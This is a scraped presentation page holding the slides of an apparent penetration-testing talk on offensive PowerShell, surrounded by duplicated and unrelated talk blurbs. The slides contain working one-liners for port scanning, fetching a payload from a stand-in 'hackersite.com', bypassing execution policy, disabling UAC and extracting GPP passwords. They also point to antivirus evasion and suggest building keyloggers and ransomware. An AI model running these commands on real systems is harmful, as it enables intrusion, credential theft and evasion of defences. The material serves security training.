This document discusses using PowerShell for penetration testing when standard tools and frameworks may not be usable due to network restrictions or lack of privileges. It provides an introduction to PowerShell and examples of how port scanning, downloading files, and other tasks could be accomplished using PowerShell scripts even in restricted environments. It also covers some of the security mechanisms in PowerShell like execution policies and how they can be bypassed to run unsigned scripts without prompts.
PowerShell for Cyber Warriors - Bsides Knoxville 2016Russel Van Tuyl
Powershell, the new hotness, is an interactive object-oriented command environment that has revolutionized the ability to interact with the Windows operating systems in a programmatic manner. This environment significantly increases the capabilities of administrators, attackers, defenders, and malware authors alike. This presentation introduces popular PowerShell tools and techniques used by penetration testers and blue team members. Tools range from in-memory only remote administration tools to Active Directory enumeration and from reverse engineering to incident response. Additionally, we will review a couple of pieces of malware that leverage PowerShell and provide information on detecting or defending against previously discussed attacks. If you're a CyberWarrior, this presentation will undoubtedly up your game by equipping you with knowledge on the almighty PowerShell.
Get-Help: An intro to PowerShell and how to Use it for Eviljaredhaight
This talk covers the basics of how PowerShell works and how to use it. It then goes over a lot of the interesting offensive PowerShell tools that are available and gives a demo of using PowerShell to escalate to Domain Admin privileges on a network.
A video of the talk is available here: https://www.youtube.com/watch?v=YSUJNInriiY
A presentation covering some of the interesting things going on with Powershell in the Infosec community. I give a brief overview of what powershell is, then go over some interesting aspects of three different offensive powershell frameworks and finally give a demo of how a local user can escalate to domain admin privileges using just these frameworks.
PowerShell for Cyber Warriors - Bsides Knoxville 2016Russel Van Tuyl
Powershell, the new hotness, is an interactive object-oriented command environment that has revolutionized the ability to interact with the Windows operating systems in a programmatic manner. This environment significantly increases the capabilities of administrators, attackers, defenders, and malware authors alike. This presentation introduces popular PowerShell tools and techniques used by penetration testers and blue team members. Tools range from in-memory only remote administration tools to Active Directory enumeration and from reverse engineering to incident response. Additionally, we will review a couple of pieces of malware that leverage PowerShell and provide information on detecting or defending against previously discussed attacks. If you're a CyberWarrior, this presentation will undoubtedly up your game by equipping you with knowledge on the almighty PowerShell.
Get-Help: An intro to PowerShell and how to Use it for Eviljaredhaight
This talk covers the basics of how PowerShell works and how to use it. It then goes over a lot of the interesting offensive PowerShell tools that are available and gives a demo of using PowerShell to escalate to Domain Admin privileges on a network.
A video of the talk is available here: https://www.youtube.com/watch?v=YSUJNInriiY
A presentation covering some of the interesting things going on with Powershell in the Infosec community. I give a brief overview of what powershell is, then go over some interesting aspects of three different offensive powershell frameworks and finally give a demo of how a local user can escalate to domain admin privileges using just these frameworks.
This presentation was given at PSConfEU and covers common privilege escalation vectors for Windows systems, as well as how to enumerate these issues with PowerUp.
This presentation was given at DerbyCon 6 on 9/23/2016. It covers the fusion of the PowerShell Empire and Python EmPyre projects, as well as new Empire 2.0 transports.
Incorporating PowerShell into your Arsenal with PS>Attackjaredhaight
This talk serves as a follow up to my Introducing PS>Attack talk and covers some new features that have been added to the tool as well as how to defend an environment against PowerShell based attacks.
This presentation was given at BSides Austin '15, and is an expanded version of the "I hunt sys admins" Shmoocon firetalk. It covers various ways to hunt for users in Windows domains, including using PowerView.
A follow on to the Encyclopedia Of Windows Privilege Escalation published by InsomniaSec at Ruxcon 2011, this talk is aimed at detailing not just escalation from user to admin and admin to system, but persistence and forced authentication as well as a few other treats.
Introducing PS>Attack: An offensive PowerShell toolkitjaredhaight
PS>Attack is designed to make it easy for Penetration Testers to incorporate PowerShell into their bag of tricks. Its a custom PowerShell console packed with some of the best offensive tools available. It's designed to be easy to use and opsec safe.
Office 365 & PowerShell - A match made in heavenSébastien Levert
In a world where we ear more and more about DevOps and continuous integration, your Office 365 integration process might be lacking some good practices and ways to automate everything. In this session, we will cover how you can use PowerShell to ease the deployment process of your applications, the monitoring of your tenants and the maintenance of all the workloads of Office 365. Being a demo-intensive session, be prepared to see a lot of PowerShell and Office 365 API code!
The 3 key takeaways of this session are :
You will learn how to communicate with the Office 365 API from PowerShell
You will be introduced to DevOps concepts in a Office 365 context
You will be able to reproduce those easy processes without problem back at work
PowerShell Plus is the most advanced Interactive Development Environment for PowerShell available today. Designed to help administrators and developers quickly learn and master Windows PowerShell, it also dramatically increases the productivity of expert users.
PowerShell Plus features a powerful interactive console, an advanced script editor and debugger and a comprehensive interactive learning center all integrated into a single product.
This presentation was given at PSConfEU and covers common privilege escalation vectors for Windows systems, as well as how to enumerate these issues with PowerUp.
This presentation was given at DerbyCon 6 on 9/23/2016. It covers the fusion of the PowerShell Empire and Python EmPyre projects, as well as new Empire 2.0 transports.
Incorporating PowerShell into your Arsenal with PS>Attackjaredhaight
This talk serves as a follow up to my Introducing PS>Attack talk and covers some new features that have been added to the tool as well as how to defend an environment against PowerShell based attacks.
This presentation was given at BSides Austin '15, and is an expanded version of the "I hunt sys admins" Shmoocon firetalk. It covers various ways to hunt for users in Windows domains, including using PowerView.
A follow on to the Encyclopedia Of Windows Privilege Escalation published by InsomniaSec at Ruxcon 2011, this talk is aimed at detailing not just escalation from user to admin and admin to system, but persistence and forced authentication as well as a few other treats.
Introducing PS>Attack: An offensive PowerShell toolkitjaredhaight
PS>Attack is designed to make it easy for Penetration Testers to incorporate PowerShell into their bag of tricks. Its a custom PowerShell console packed with some of the best offensive tools available. It's designed to be easy to use and opsec safe.
Office 365 & PowerShell - A match made in heavenSébastien Levert
In a world where we ear more and more about DevOps and continuous integration, your Office 365 integration process might be lacking some good practices and ways to automate everything. In this session, we will cover how you can use PowerShell to ease the deployment process of your applications, the monitoring of your tenants and the maintenance of all the workloads of Office 365. Being a demo-intensive session, be prepared to see a lot of PowerShell and Office 365 API code!
The 3 key takeaways of this session are :
You will learn how to communicate with the Office 365 API from PowerShell
You will be introduced to DevOps concepts in a Office 365 context
You will be able to reproduce those easy processes without problem back at work
PowerShell Plus is the most advanced Interactive Development Environment for PowerShell available today. Designed to help administrators and developers quickly learn and master Windows PowerShell, it also dramatically increases the productivity of expert users.
PowerShell Plus features a powerful interactive console, an advanced script editor and debugger and a comprehensive interactive learning center all integrated into a single product.
Practical PowerShell Programming for Professional People - Extended EditionBen Ten (0xA)
The best hackers are those that can write their own tools or modify existing ones. Regardless of whether you are blue team- red team- purple team- white hat- gray hat- or black hat- PowerShell should be in your repository of tools. While I encourage people to learn other languages as well- PowerShell is a dynamic tool and should not be overlooked. This talk is meant to be an introductory (101) session for PowerShell. I will be giving you a crash course in PowerShell scripting that will equip you to create practical PowerShell scripts for defense- offense- and even some fun things to mess around with people. This talk is designed for anyone who has never done any PowerShell or just starting to learn. Bring your laptop with PowerShell 3.0 or later- and your favorite text editor (like SublimeText) installed so you can script along with me. You will be able to write a functioning PowerShell script by the end of this talk! Come see the potential power you can unlock by learning PowerShell.
Better, Faster, Stronger! Boost Your Team-Based SharePoint Development Using ...Richard Calderon
In this session, I discuss and demonstrate how you can use SharePoint 2010 Web Templates and PowerShell scripts to give your team-based SharePoint development process a much needed productivity boost. Using these techniques, you enable your team to quickly test and review their custom components against your complete SharePoint solution while simultaneously eliminating inconsistencies often created by manual configurations.
By the end of this session, you will have learned:
How SharePoint web templates can be used to provision customized SharePoint sites
How to leverage PowerShell scripts to automate your custom site build and feature deployments
The key benefits of this approach for team-based SharePoint development
So stop wasting time and come see how you can help make your SharePoint team development better, faster, and stronger!
Talks about PowerShell UIAutomation used by Y Soft for automating GUI Windows installer testing in multiple languages. How to integrate PowerShell with continuous integration system Jenkins.
Windows - Having Its Ass Kicked by Puppet and PowerShell Since 2012Puppet
Unix environments has fantastic tooling order to irridicate the need for manual server configuaration. Windows is completely behind in the use of these tools. PowerShell is now emerging as the tool for Windows admins to manage environments and deployments. Can PowerShell help to bring the devops culture to the Windows development world? In this session, I will demonstrate how PowerShell has become a tool necessary to know when working on a windows environment. The session will demonstrate how development environments can be built in a fraction of the time using Puppet and PowerShell. PowerShell is fast becoming a rockstar of the Windows configuration world. Since Puppet added support for Windows, we can really kick windows configuration management into submission
Paul Stack
Principal Software Developer, OpenTable
Paul Stack is a London based developer working on the .net technology stack. Paul has spoken at various events throughout the world as well as extensively in the UK about his passion for continuous integration and continuous delivery and why they should be part of what developers do on a day to day basis. He believes that reliably delivering software is just as important as its development. Paul's newest passion is the DevOps movement and how this helps not just development and operations but the entire business and it's customers.
Geek Sync | Using PowerShell with Python and SQL ServerIDERA Software
You can watch the replay for this Geek Sync webcast in the IDERA Resource Center: http://ow.ly/Mf3H50A5dMC
Just as PowerShell is argued as the main technology for automation in Windows Datacenters Infrastructure, it is equally important in other non-Windows Operating Systems. According to Maximo Trinidad, Windows Administrators have an advantage working with PowerShell just as Linux Administrators have an advantage with Bash / PHP / Python.
Join IDERA and Maximo Trinidad as he walks you through using PowerShell with both SQL Server and Python. This Geek Sync will be interactive and very demo intensive. Questions are encouraged!
About Maximo Trinidad: In Florida, Maximo is known as Mr. PowerShell. He is the founder of the Florida PowerShell User Group which meets on a monthly basis. Maximo is originally from Puerto Rico and has been working in the technology world since 1979. Over the years, he has worked with SQL Server Technologies, provided support to Windows Servers/Client machines, Microsoft Virtualization Technologies, and built some Visual Studio solutions. He has been a Microsoft PowerShell MVP since 2009 and MVP SAPIEN Technologies 2015. He speaks at many of the SQLSaturdays, IT Pro and .NET camps events around Florida.
On February 28th, I delivered a talk at the Romanian PowerShell User Group about discovering hosts and services on the local network in a post-exploitation scenario. Slides and demo code here: https://goo.gl/SQHjj3
Practical PowerShell Programming for Professional PeopleBen Ten (0xA)
The best hackers are those that can write their own tools or modify existing ones. Regardless of whether you are blue team, red team, purple team, white hat, gray hat, or black hat, PowerShell should be in your repository of tools. While I encourage people to learn other languages as well, PowerShell is a dynamic tool and should not be overlooked. This talk is meant to be an introductory (101) session for PowerShell. I will be giving you a crash course in PowerShell scripting that will equip you to create practical PowerShell scripts for defense, offense, and even some fun things to mess around with people. This talk is designed for anyone who has never done any PowerShell or just starting to learn. Bring your laptop with PowerShell 3.0 or later, and your favorite text editor (like SublimeText) installed so you can script along with me. You will be able to write a functioning PowerShell script by the end of this talk! Come see the potential power you can unlock by learning PowerShell; and to see how often I can abuse the letter P!
This slideshow outlines 10 reasons why hackers use PowerShell to turn an operating system against itself and compromise entire networks without needing to install a single piece of software.
As organizations assess the security of their information systems, the need for automation has become more and more apparent. Not only are organizations attempting to automate their assessments, the need is becoming more pressing to perform assessments centrally against large numbers of enterprise systems. Penetration testers can use this automation to make their post-exploitation efforts more thorough, repeatable, and efficient. Defenders need to understand the techniques attackers are using once an initial compromise has occurred so they can build defenses to stop the attacks. Microsoft's PowerShell scripting language has become the defacto standard for many organizations looking to perform this level of distributed automation. In this presentation James Tarala, of Enclave Security, will describe to students the enterprise capabilities PowerShell offers and show practical examples of how PowerShell can be used to perform large scale penetration tests of Microsoft Windows systems.
Lateral Movement: How attackers quietly traverse your NetworkEC-Council
After successfully attacking an endpoint and gaining a foothold there, sophisticated attackers know that to get to the valuable data within an organization they must quietly pivot. From reconnaissance to escalation of privileges to stealing credentials, learn about the tactics and tools that attackers are using today.
How do you deal with issues that happen in production? Error and Event logs are helpful but often they provide little to no help with things like deadlocks and memory leaks.
In this session we'll explore some low level utilities that allow us to take snapshots of running code and bring it back in house for analysis.
Lions, Tigers and Deers: What building zoos can teach us about securing micro...Sysdig
How to secure microservices running in containers? Strategies for Docker, Kubernetes, Openshift, RancherOS, DC/OS Mesos.
Privileges, resources and visibility constrains with capabilities, cgroups and namespaces. Image vulnerability scanning and behaviour security monitoring with Sysdig Falco.
RIoT (Raiding Internet of Things) by Jacob HolcombPriyanka Aash
The recorded version of 'Best Of The World Webcast Series' [Webinar] where Jacob Holcomb speaks on 'RIoT (Raiding Internet of Things)' is available on CISOPlatform.
Best Of The World Webcast Series are webinars where breakthrough/original security researchers showcase their study, to offer the CISO/security experts the best insights in information security.
For more signup(it's free): www.cisoplatform.com
This is about encouraging our audience about known good practices. let them introduced why continuous feature development is essential and why that adds value over following rigid processes.
Ansible: How to Get More Sleep and Require Less CoffeeSarah Z
Why you need automation, configuration management and remote execution in your life. An intro to Ansible and how it can make your life in Ops infinitely easier.
[HES2013] Virtually secure, analysis to remote root 0day on an industry leadi...Hackito Ergo Sum
Today most networks present one “gateway” to the whole network – The SSL-VPN. A vector that is often overlooked and considered “secure”, we decided to take apart an industry leading SSL-VPN appliance and analyze it to bits to thoroughly understand how secure it really is. During this talk we will examine the internals of the F5 FirePass SSL-VPN Appliance. We discover that even though many security protections are in-place, the internals of the appliance hides interesting vulnerabilities we can exploit. Through processes ranging from reverse engineering to binary planting, we decrypt the file-system and begin examining the environment. As we go down the rabbit hole, our misconceptions about “security appliances” are revealed.
Using a combination of web vulnerabilities, format string vulnerabilities and a bunch of frustration, we manage to overcome the multiple limitations and protections presented by the appliance to gain a remote unauthenticated root shell. Due to the magnitude of this vulnerability and the potential for impact against dozens of fortune 500 companies, we contacted F5 and received one of the best vendor responses we’ve experienced – EVER!
https://www.hackitoergosum.org
The Dirty Little Secrets They Didn’t Teach You In Pentesting Class Chris Gates
Derbycon 2011
This talk is about methodologies and tools that we use or have coded that make our lives and pentest schedule a little easier, and why we do things the way we do. Of course, there will be a healthy dose of Metasploit in the mix.
JMeter webinar - integration with InfluxDB and GrafanaRTTS
Watch this recorded webinar about real-time monitoring of application performance. See how to integrate Apache JMeter, the open-source leader in performance testing, with InfluxDB, the open-source time-series database, and Grafana, the open-source analytics and visualization application.
In this webinar, we will review the benefits of leveraging InfluxDB and Grafana when executing load tests and demonstrate how these tools are used to visualize performance metrics.
Length: 30 minutes
Session Overview
-------------------------------------------
During this webinar, we will cover the following topics while demonstrating the integrations of JMeter, InfluxDB and Grafana:
- What out-of-the-box solutions are available for real-time monitoring JMeter tests?
- What are the benefits of integrating InfluxDB and Grafana into the load testing stack?
- Which features are provided by Grafana?
- Demonstration of InfluxDB and Grafana using a practice web application
To view the webinar recording, go to:
https://www.rttsweb.com/jmeter-integration-webinar
LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...DanBrown980551
Do you want to learn how to model and simulate an electrical network from scratch in under an hour?
Then welcome to this PowSyBl workshop, hosted by Rte, the French Transmission System Operator (TSO)!
During the webinar, you will discover the PowSyBl ecosystem as well as handle and study an electrical network through an interactive Python notebook.
PowSyBl is an open source project hosted by LF Energy, which offers a comprehensive set of features for electrical grid modelling and simulation. Among other advanced features, PowSyBl provides:
- A fully editable and extendable library for grid component modelling;
- Visualization tools to display your network;
- Grid simulation tools, such as power flows, security analyses (with or without remedial actions) and sensitivity analyses;
The framework is mostly written in Java, with a Python binding so that Python developers can access PowSyBl functionalities as well.
What you will learn during the webinar:
- For beginners: discover PowSyBl's functionalities through a quick general presentation and the notebook, without needing any expert coding skills;
- For advanced developers: master the skills to efficiently apply PowSyBl functionalities to your real-world scenarios.
UiPath Test Automation using UiPath Test Suite series, part 3DianaGray10
Welcome to UiPath Test Automation using UiPath Test Suite series part 3. In this session, we will cover desktop automation along with UI automation.
Topics covered:
UI automation Introduction,
UI automation Sample
Desktop automation flow
Pradeep Chinnala, Senior Consultant Automation Developer @WonderBotz and UiPath MVP
Deepak Rai, Automation Practice Lead, Boundaryless Group and UiPath MVP
UiPath Test Automation using UiPath Test Suite series, part 4DianaGray10
Welcome to UiPath Test Automation using UiPath Test Suite series part 4. In this session, we will cover Test Manager overview along with SAP heatmap.
The UiPath Test Manager overview with SAP heatmap webinar offers a concise yet comprehensive exploration of the role of a Test Manager within SAP environments, coupled with the utilization of heatmaps for effective testing strategies.
Participants will gain insights into the responsibilities, challenges, and best practices associated with test management in SAP projects. Additionally, the webinar delves into the significance of heatmaps as a visual aid for identifying testing priorities, areas of risk, and resource allocation within SAP landscapes. Through this session, attendees can expect to enhance their understanding of test management principles while learning practical approaches to optimize testing processes in SAP environments using heatmap visualization techniques
What will you get from this session?
1. Insights into SAP testing best practices
2. Heatmap utilization for testing
3. Optimization of testing processes
4. Demo
Topics covered:
Execution from the test manager
Orchestrator execution result
Defect reporting
SAP heatmap example with demo
Speaker:
Deepak Rai, Automation Practice Lead, Boundaryless Group and UiPath MVP
PHP Frameworks: I want to break free (IPC Berlin 2024)Ralf Eggert
In this presentation, we examine the challenges and limitations of relying too heavily on PHP frameworks in web development. We discuss the history of PHP and its frameworks to understand how this dependence has evolved. The focus will be on providing concrete tips and strategies to reduce reliance on these frameworks, based on real-world examples and practical considerations. The goal is to equip developers with the skills and knowledge to create more flexible and future-proof web applications. We'll explore the importance of maintaining autonomy in a rapidly changing tech landscape and how to make informed decisions in PHP development.
This talk is aimed at encouraging a more independent approach to using PHP frameworks, moving towards a more flexible and future-proof approach to PHP development.
Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...UiPathCommunity
💥 Speed, accuracy, and scaling – discover the superpowers of GenAI in action with UiPath Document Understanding and Communications Mining™:
See how to accelerate model training and optimize model performance with active learning
Learn about the latest enhancements to out-of-the-box document processing – with little to no training required
Get an exclusive demo of the new family of UiPath LLMs – GenAI models specialized for processing different types of documents and messages
This is a hands-on session specifically designed for automation developers and AI enthusiasts seeking to enhance their knowledge in leveraging the latest intelligent document processing capabilities offered by UiPath.
Speakers:
👨🏫 Andras Palfi, Senior Product Manager, UiPath
👩🏫 Lenka Dulovicova, Product Program Manager, UiPath
Let's dive deeper into the world of ODC! Ricardo Alves (OutSystems) will join us to tell all about the new Data Fabric. After that, Sezen de Bruijn (OutSystems) will get into the details on how to best design a sturdy architecture within ODC.
Accelerate your Kubernetes clusters with Varnish CachingThijs Feryn
A presentation about the usage and availability of Varnish on Kubernetes. This talk explores the capabilities of Varnish caching and shows how to use the Varnish Helm chart to deploy it to Kubernetes.
This presentation was delivered at K8SUG Singapore. See https://feryn.eu/presentations/accelerate-your-kubernetes-clusters-with-varnish-caching-k8sug-singapore-28-2024 for more details.
Connector Corner: Automate dynamic content and events by pushing a buttonDianaGray10
Here is something new! In our next Connector Corner webinar, we will demonstrate how you can use a single workflow to:
Create a campaign using Mailchimp with merge tags/fields
Send an interactive Slack channel message (using buttons)
Have the message received by managers and peers along with a test email for review
But there’s more:
In a second workflow supporting the same use case, you’ll see:
Your campaign sent to target colleagues for approval
If the “Approve” button is clicked, a Jira/Zendesk ticket is created for the marketing design team
But—if the “Reject” button is pushed, colleagues will be alerted via Slack message
Join us to learn more about this new, human-in-the-loop capability, brought to you by Integration Service connectors.
And...
Speakers:
Akshay Agnihotri, Product Manager
Charlie Greenberg, Host
State of ICS and IoT Cyber Threat Landscape Report 2024 previewPrayukth K V
The IoT and OT threat landscape report has been prepared by the Threat Research Team at Sectrio using data from Sectrio, cyber threat intelligence farming facilities spread across over 85 cities around the world. In addition, Sectrio also runs AI-based advanced threat and payload engagement facilities that serve as sinks to attract and engage sophisticated threat actors, and newer malware including new variants and latent threats that are at an earlier stage of development.
The latest edition of the OT/ICS and IoT security Threat Landscape Report 2024 also covers:
State of global ICS asset and network exposure
Sectoral targets and attacks as well as the cost of ransom
Global APT activity, AI usage, actor and tactic profiles, and implications
Rise in volumes of AI-powered cyberattacks
Major cyber events in 2024
Malware and malicious payload trends
Cyberattack types and targets
Vulnerability exploit attempts on CVEs
Attacks on counties – USA
Expansion of bot farms – how, where, and why
In-depth analysis of the cyber threat landscape across North America, South America, Europe, APAC, and the Middle East
Why are attacks on smart factories rising?
Cyber risk predictions
Axis of attacks – Europe
Systemic attacks in the Middle East
Download the full report from here:
https://sectrio.com/resources/ot-threat-landscape-reports/sectrio-releases-ot-ics-and-iot-security-threat-landscape-report-2024/
Software Delivery At the Speed of AI: Inflectra Invests In AI-Powered QualityInflectra
In this insightful webinar, Inflectra explores how artificial intelligence (AI) is transforming software development and testing. Discover how AI-powered tools are revolutionizing every stage of the software development lifecycle (SDLC), from design and prototyping to testing, deployment, and monitoring.
Learn about:
• The Future of Testing: How AI is shifting testing towards verification, analysis, and higher-level skills, while reducing repetitive tasks.
• Test Automation: How AI-powered test case generation, optimization, and self-healing tests are making testing more efficient and effective.
• Visual Testing: Explore the emerging capabilities of AI in visual testing and how it's set to revolutionize UI verification.
• Inflectra's AI Solutions: See demonstrations of Inflectra's cutting-edge AI tools like the ChatGPT plugin and Azure Open AI platform, designed to streamline your testing process.
Whether you're a developer, tester, or QA professional, this webinar will give you valuable insights into how AI is shaping the future of software delivery.
Leading Change strategies and insights for effective change management pdf 1.pdf
Power on, Powershell
1. Power on, PowerShell
Using PowerShell to do the nasty
Nikhil Sreekumar
roo7break@gmail.com
@roo7break
www.roo7break.co.uk
2. The plug
• Nikhil Sreekumar
– Senior Penetration Tester @ 7Safe
– Over three years as penetration tester
• CREST ACE certified
– Also deliver’s 7Safe’s courses
• CSTP – Certified Security Testing Professional
• CAST – Certified Application Security Tester (advanced)
– Previous roles
• Breach Forensic Investigator
• IT Consultant
– Loves Python; Mixed feelings for Ruby; Hates Perl
3. Intro
• Normal penetration testing revolves a lot around
network based attacks using
– Attack frameworks (toolkits)
• Social engineering toolkit
• Metasploit
• Core Impact
– Exploit sources
• Exploit-db.com
• 1337day.com
• Exploit -> Get a shell -> Exploit more -> Get
domain admin -> Report -> Go out for a beer
4. But, what if
• You have access to a system, but
– No outbound connection*
– You are in a restricted
environment (e.g. Citrix)
– Current user privileges are very
restricted
– Payloads/tools detected by Anti-
Virus/HIDS
* Open traffic is blocked
5. Time for a rethink
• Cannot rely on any open source exploitation
framework
– AV vendors are WATCHING!
– System/Network admins are getting smarter and
cleverer
– Organisations are investing in security
• Maybe its time to think of an alternate solution.
– Why not look into bending existing technology to do
our bidding?
6.
7. Welcome to, PowerShell
• Unix bash like shell in Windows
– Way powerful than CMD
• Available from Vista upwards
– Can be disabled from Server 2008; however its not
that easy in Windows 7
• Allows to
– Manage registry, services, processes, event logs
and Windows Management Instrumentation (WMI)
– Task based scripting language
– Powerful object manipulation capabilities
– Simplified and consistent design
• Full integration with
– Existing Microsoft products like Exchange, AD, etc.
– Can be directly called from .NET framework
[Microsoft Technet] - http://technet.microsoft.com/en-gb/library/bb978526.aspx
9. Scripting PowerShell
• Use of CmdLets
– Lightweight command; used in PowerShell
environment.
– Typically a .NET framework class
– Invoked within the context of automation scripts
provided at the command line.
– Also invoked programmatically through Windows
PowerShell APIs.
10. Scripting PowerShell
• Basic CmdLets
CmdLets PowerShell Alias CMD.exe *nix environment
Get-Help man, help help man
Get-Content cat, gc, type type cat
Move-Item move, mv, mi move mv
Copy-Item cp, copy, cpi copy cp
Select-String NONE find, findstr grep
Source: http://pen-testing.sans.org/blog/2012/04/27/presentation-powershell-for-pen-testers
11. Scripting PowerShell
• Basic CmdLets (contd.)
– Where-Object (alias ?)
• Filter objects passed down via pipe (|)
Get-Service | ? {$_.Status –eq “Running”}
Get-Process | ? { $_.Modules -like "*(rsaenh.dll)*" -and
$_.Modules -like "*(iphlpapi.dll)*" -and $_.Modules -like
"*(WININET.dll)*" }
– ForEach-Object (alias %)
• Not to be confused with loop statement, ForEach
• Action to be performed on each object passed down via pipe (|)
Get-ChildItem | ForEach-Object {echo $_.Name}
Same as dir :D
– Get-Member (alias gm)
• Provides you the list of all objects you can access to filter your query using ? And %
Get-ChildItem | gm
• For more info, refer:
– http://www.powershellpro.com/powershell-tutorial-introduction/tutorial-powershell-cmdlet/
– http://technet.microsoft.com/en-us/scriptcenter/dd772285.aspx
12. How to script using PowerShell
• Using the PowerShell shell
– RUN powershell.exe to start
• Echo commands into a file; Save as .ps1
– .ps1 files are automatically recognised as
PowerShell scripts
– Can be manipulated using the built-in PowerShell
Integrated Scripting Environment (ISE) – IDE for
PowerShell
13. Sample uses for PT
• Port Scanning
1..1024 | ForEach-Object {
echo
((new-object Net.Sockets.TcpClient)
.Connect(“<TargetIP>",$_)) “Port $_ is
open"
} 2>$null
Port 80 is open
• You could modify the script above to send a string
to remote host) for Egress checking
14. Sample uses for PT
• Port Sweep
– Scan the range for all IPs with port 8080 open
1..255 | ForEach-Object {
echo
((New-Object Net.Sockets.TcpClient)
.Connect("10.1.1.$_",8080)) "10.1.1.$_:8080
is open" }
2>$null
10.1.1.100:8080 is open
15. Sample uses for PT
• Downloading stuff
– Binaries
(New-Object
System.Net.WebClient).DownloadFile("http://h
ackersite.com/pwnc.exe","c:pwnc.exe“)
– Text file stdout to local file
(New-Object
System.Net.WebClient).DownloadString("http:/
/hackersite.com/malicious.ps1") | Out-File –
Encoding ASCII securescript.ps1
16. Hold on tiger
• Did you really think its going to be that easy??
– PowerShell isn’t going to let you run any script
without having a say.
• It tries to enforce “security” using something
called Execution Policy.
– Get-Execution Policy
• Will give you current policy status
17. The Security
• Execution Policies:
– Restricted
• Default policy
• Only individual commands; no scripts
– AllSigned
• Allows scripts execution
• Needs to be signed by trusted publisher
• Prompts if ran using untrusted publishers
– RemoteSigned
• Allows scripts execution
• Scripts downloaded from Internet should be signed by trusted
publisher
• Signing not required for local scripts
18. The Security (contd.)
– Unrestricted
• Allows unsigned script execution
• Prompts warning before execution
– Bypass
• Nothing is blocked; no warnings or prompts
• To be used when PowerShell is used within a larger app
– Undefined
• No specific policy is set to current scope
– If nothing is specified, default policy is applied = Restricted.
• For more information, RTFM
20. Before we move on
• UAC (User Account Control)
– Is a pain in the a**
• Most of the attacks described may/may not interfere with UAC.
• At this point in time, we cannot bypass UAC. Or can we?
– Will take this up at a later stage.
To check UAC level
$(Get-ItemProperty -Path
registry::HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionp
oliciessystem -Name EnableLUA).EnableLUA
If value is “1”, then UAC is ON.
• To disable UAC
Set-ItemProperty -Path
HKLM:SoftwareMicrosoftWindowsCurrentVersionpoliciessystem -Name
EnableLUA –Value
However, we need local admin rights
And, a system reboot for this to change to take effect
21. Think like a hacker
• These policies can be bypassed
• Technique #1
Change the default policy to RemoteSigned
Set-ExecutionPolicy RemoteSigned
–Scope CurrentUser
– However we need admin privileges to do this
– You don’t want to ‘accidently’ set the policy for all
users
22. Think like a hacker
• Technique #2
Pass the command
powershell –command dir
• Executes the specified commands (and any parameters) as though
they were typed at the PowerShell command prompt
[Powershell Help]
23. Think like a hacker
• Technique #2 (contd.)
Pass the command
powershell –command “New-Object
System.Net.WebClient).DownloadFil
e("http://hackersite.com/pwnc.exe
","c:pwnc.exe“)”
powershell –command “Invoke-
Expression (gc .script.ps1)”
• Need a one liner?
gc .script.ps1 | iex
24. Think like a hacker
• Technique #3
CreateCMD
• Run a script without actually running a script
– execute the script contents in the current shell context with all new
functions that are in the script
• Uses “-EncodedCommand”
– Accepts Base64 version of the command
• Checkout Dave Kennedy (ReL1K) and Josh Kelly (winfang) Defcon 18
talk
– PowerShell.. OMFG
• Impact
– Policy does not matter
– No need to disable execution policies
– No registry interaction, no reboots, etc.
25. Think like a hacker
• Technique #3 (contd.)
– Write your script (.ps1) in one long line.
– All {}s should be on the same line and use ; to terminate
each command.
$command = Get-Content .script.ps1
$encodedcmd =
[convert]::ToBase64String([Text.Encod
ing]::Unicode.GetBytes($command))
Powershell.exe –EncodedCommand
$encodedcmd
26. Think like a hacker
• Technique #4
• This technique will
– try and bypass the execution policy
– execute the script in the background
• Can be used once you have a way into a system
– E.g. shell
powershell.exe -ExecutionPolicy Bypass -
NoLogo -NonInteractive -NoProfile -
WindowStyle Hidden -File <script_name>
Source: http://obscuresecurity.blogspot.co.uk/2011/08/powershell-executionpolicy.html
27. Post Exploitation the
PowerShell way
Exploiting Windows 2008 Group Policy Preferences
• Group Policy preferences, new for the Windows Server 2008
operating system, include more than 20 new Group Policy
extensions that expand the range of configurable settings
within a Group Policy object (GPO) [http://technet.microsoft.com/en-
us/library/cc731892%28WS.10%29.aspx]
• Helps setting local admin password for workstations and
servers
– Adding new users on local machines, etc.
– Via Local User and Groups Extension
28. Post Exploitation the
PowerShell way
Exploiting Windows 2008 Group Policy Preferences
(contd.)
• Unknown to the general public (and many system admins)
Windows was storing the encrypted admin passwords in an
XML files accessible to normal users
• Location:
– serversysvoldomainPolicies{Hash}MACHINEPreferencesGrou
psGroup.xml
29. Post Exploitation the
PowerShell way
Exploiting Windows 2008 Group Policy Preferences
(contd.)
30. Post Exploitation the
PowerShell way
Exploiting Windows 2008 Group Policy Preferences
(contd.)
• Encryption
– AES = Strong
• It would take years to decrypt that password. Only if someone
could help me..
• Why not ask Microsoft?
31. Post Exploitation the
PowerShell way
http://msdn.microsoft.com/en-us/library/cc422924.aspx
32. Post Exploitation the
PowerShell way
• Lets use PowerShell to extract these
passwords
– Connect to domain controller as normal user
$output = get-childitem
serversysvoldomainPolicies -
filter *.xml -recurse | Get-
Content;[regex]::match($output,'cpassw
ord="(?<pwd>.+?)"') | foreach
{$_.groups["pwd"].value}
33. Post Exploitation the
PowerShell way
• Are there any more locations?
• Oh yeah!
– ServicesServices.xml
– ScheduledTasksScheduledTasks.xml
– PrintersPrinters.xml
– DrivesDrives.xml
– DataSourcesDataSources.xml
• Source:
http://rewtdance.blogspot.co.uk/2012/06/exploi
ting-windows-2008-group-policy.html
34. Would you like some
exploitation with that, Sir?
• Default tools/exploits/payloads are detectable
– Customize them
– Design your own exploits
– Innovative encoding/encryption techniques
– Use PowerShell to execute it for you
• Examples
– Hyperion runtime encrypter by Nullsecurity.net
• Produces an AES encrypted executable that brute forces its own key in-memory
• Can bypass most anti-virus solutions
• http://nullsecurity.net/papers.html
– Alphanum + ASCII encode + Base64 your executable (use metasploit to do this – msfvenom)
• Then use PowerShell to decode it in-memory and execute it
– Check out www.exploit-monday.com by Matthew Graeber for sample codes
– Also check out the PowerShell code used in SET -
http://svn.secmaniac.com/social_engineering_toolkit/src/powershell/
• Can bypass most anti-virus solutions
• http://www.offensive-security.com/metasploit-unleashed/Msfvenom
35. More??
• Homework
• Try out PowerShell based attacks using Social Engineering
Toolkit (SET)
• Recode Metasploit modules to be used within PowerShell
scripts
• Come up with innovative attacks using PowerShell.
– Webcam, microphone, keyloggers, etc.
• Naughty, naughty.
• How about designing your own ransomware
